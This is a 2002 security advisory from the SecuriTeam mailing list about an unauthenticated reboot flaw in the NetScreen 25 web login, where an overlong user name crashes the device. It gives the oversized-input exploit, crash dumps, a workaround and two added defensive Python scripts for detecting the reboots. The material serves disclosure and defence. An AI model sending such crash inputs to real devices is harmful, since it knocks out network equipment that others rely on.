[NEWS] NetScreen 25 Unauthorized User Reboot (DoS)

From: support@securiteam.com
Date: 05/27/02


To: list@securiteam.com
Date: Mon, 27 May 2002 20:22:43 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  NetScreen 25 Unauthorized User Reboot (DoS)
------------------------------------------------------------------------

SUMMARY

A remote, unauthenticated user can cause a NetScreen 25
<http://www.netscreen.com/products/index.html> to reboot. Repeating the
attack effectively results in a denial of service against the product.

DETAILS

Vulnerable systems:
 * NetScreen 25 version 3.0.1r1.1

Workaround:
Restrict the IP addresses that can connect to the web interface, and
upgrade to the latest version of ScreenOS.

Vendor status:
The vendor has already fixed this issue. Please upgrade to the latest
version.

Exploit:
Logging on to the NetScreen with a user name of:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
Would cause the device to reboot.

Syslog output:
Remote syslog shows just that the device's interfaces came back up:
May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra system-notification-00513: The physical state of the interface trust has changed to Up (2002-05-24 13:36:47)
May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra system-notification-00513: The physical state of the interface untrust has changed to Up (2002-05-24 13:36:47)
May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra system-notification-00513: The physical state of the interface DMZ has changed to Up (2002-05-24 13:36:48)
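
Because the remote syslog records only the interfaces coming back up, a burst of link-up notifications from one device is the signal to alert on. The following detection sketch is an added example, not part of the original advisory. The function name, the three-interface threshold, the five-second window and the `fw-lab` sample line are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Message format copied from the syslog lines in the advisory.
UP_EVENT = re.compile(
    r"device_id=(?P<dev>\S+) system-notification-00513: The physical state "
    r"of the interface (?P<ifname>\S+) has changed to Up "
    r"\((?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\)"
)

def suspected_reboots(lines, min_interfaces=3, window=timedelta(seconds=5)):
    """Return (device, first_ts, interfaces) for each burst in which at least
    min_interfaces distinct interfaces of one device report Up within window."""
    events = defaultdict(list)
    for line in lines:
        m = UP_EVENT.search(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events[m["dev"]].append((ts, m["ifname"]))

    alerts = []
    for dev, evs in events.items():
        evs.sort()
        i = 0
        while i < len(evs):
            start = evs[i][0]
            # evs is sorted, so the burst is a contiguous run starting at i.
            burst = [e for e in evs[i:] if e[0] - start <= window]
            names = sorted({name for _, name in burst})
            if len(names) >= min_interfaces:
                alerts.append((dev, start, names))
                i += len(burst)
            else:
                i += 1
    return alerts

_FMT = ("May 24 14:36:59 192.168.1.100 {d}: NetScreen device_id={d} "
        "system-notification-00513: The physical state of the interface "
        "{i} has changed to Up ({t})")
SAMPLE_LINES = [
    # First three entries reproduce the advisory's syslog output.
    _FMT.format(d="phaedra", i="trust", t="2002-05-24 13:36:47"),
    _FMT.format(d="phaedra", i="untrust", t="2002-05-24 13:36:47"),
    _FMT.format(d="phaedra", i="DMZ", t="2002-05-24 13:36:48"),
    # Constructed: a single link flap on a hypothetical device, not a reboot.
    _FMT.format(d="fw-lab", i="untrust", t="2002-05-24 09:00:00"),
]
```
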

Console output:
phaedra->
*******************************************************
                Exception Dump
*******************************************************
System up time: 3 hours 20 minutes 48 seconds
Exception(Instruction TLB Miss)
GPR:
R0: 78787878 R1: 03044e50 R2: 00470928 R3: 00000000
R4: 03044e08 R5: 000000ac R6: 0074bde8 R7: 78787878
R8: 004c9d70 R9: 03a81d50 R10: 004fcb58 R11: 004d0000
R12: 40000024 R13: 004d1344 R14: 000d0904 R15: 80020020
R16: 43c00da1 R17: 300b6030 R18: 60101022 R19: 00000000
R20: 00750000 R21: 00470000 R22: 00000001 R23: 00755078
R24: 78787878 R25: 78787878 R26: 78787878 R27: 78787878
R28: 78787878 R29: 78787878 R30: 78787878 R31: 78787878
Special Register:
CR: 20000024 XER: 00000000 LR: 78787878 CTR: 00000000
MSR: 00021200 SRR0: 78787878 SRR1: 00029230 SRR2: 00300044
SRR3: 00000000 DBSR: 00000000 TCR: fc000000 TSR: 04000000
ESR: 00000000 DEAR: 00000000 PID: 00000000
*******************************************************
                Exception Dump
*******************************************************
System up time: 3 hours 20 minutes 48 seconds
Exception(Machine Check)
GPR:
R0: 78787878 R1: 03044d68 R2: 00470928 R3: 00000000
R4: 00000000 R5: 00000000 R6: 78787878 R7: 002fffd4
R8: 004c9d70 R9: 00000000 R10: 000002ec R11: 00000020
R12: 40000024 R13: 004d1344 R14: 000d0904 R15: 80020020
R16: 43c00da1 R17: 300b6030 R18: 60101022 R19: 00000000
R20: 00750000 R21: 00470000 R22: 00000001 R23: 00755078
R24: 78787878 R25: 78787878 R26: 78787878 R27: 00000001
R28: 03044d94 R29: 0000001f R30: 78787878 R31: 00000000
Special Register:
CR: 40000024 XER: 20000000 LR: 002fffd4 CTR: 00000000
MSR: 00000000 SRR0: 78787878 SRR1: 00029230 SRR2: 00300044
SRR3: 00021200 DBSR: 00000000 TCR: fc000000 TSR: 0c000000
ESR: 00000000 DEAR: 00000000 PID: 00000000
Trace Dump:
00300044 002fffd4 002ff8f4 002fee04 00000000
System Level:
Image In Interrupt Level
********************************************************
        Please use GDB to track the trace
********************************************************

NetScreen PowerPC 405GP BootROM V1.01 (c)1997-2002 NetScreen Technologies
Inc. All rights reserved

Check Platform...... NS-25
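
A triage helper for the console output above, added here as an example (not part of the original advisory or of any NetScreen tooling). It lists the registers in each exception dump whose value is one printable ASCII byte repeated four times, such as 78787878 ("xxxx", the byte that fills the oversized user name). The function name is an assumption, and the embedded text is an excerpt of the dumps shown above.

```python
import re

DUMP_HEADER = re.compile(r"Exception\((?P<kind>[^)]+)\)")
REGISTER = re.compile(r"\b(?P<name>[A-Z]+\d*):\s+(?P<value>[0-9a-f]{8})\b")

def repeated_ascii_registers(console_text):
    """Map each exception kind to {register: char} for register values made
    of a single printable ASCII byte repeated four times."""
    findings = {}
    current = None
    for line in console_text.splitlines():
        header = DUMP_HEADER.search(line)
        if header:
            current = findings.setdefault(header["kind"], {})
            continue
        if current is None:
            continue  # text before the first dump header
        for m in REGISTER.finditer(line):
            raw = bytes.fromhex(m["value"])
            # 00000000 is also one repeated byte, so require printable ASCII.
            if len(set(raw)) == 1 and 0x20 <= raw[0] <= 0x7E:
                current[m["name"]] = chr(raw[0])
    return findings

# Excerpt of the two exception dumps from the advisory's console output.
SAMPLE_DUMP = """\
Exception(Instruction TLB Miss)
GPR:
R0: 78787878 R1: 03044e50 R2: 00470928 R3: 00000000
R28: 78787878 R29: 78787878 R30: 78787878 R31: 78787878
Special Register:
CR: 20000024 XER: 00000000 LR: 78787878 CTR: 00000000
MSR: 00021200 SRR0: 78787878 SRR1: 00029230 SRR2: 00300044
Exception(Machine Check)
Special Register:
CR: 40000024 XER: 20000000 LR: 002fffd4 CTR: 00000000
MSR: 00000000 SRR0: 78787878 SRR1: 00029230 SRR2: 00300044
"""

if __name__ == "__main__":
    for kind, regs in repeated_ascii_registers(SAMPLE_DUMP).items():
        print(kind, regs)
```
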

ADDITIONAL INFORMATION

The information has been provided by <mailto:quentyn@fotango.com>
quentyn.
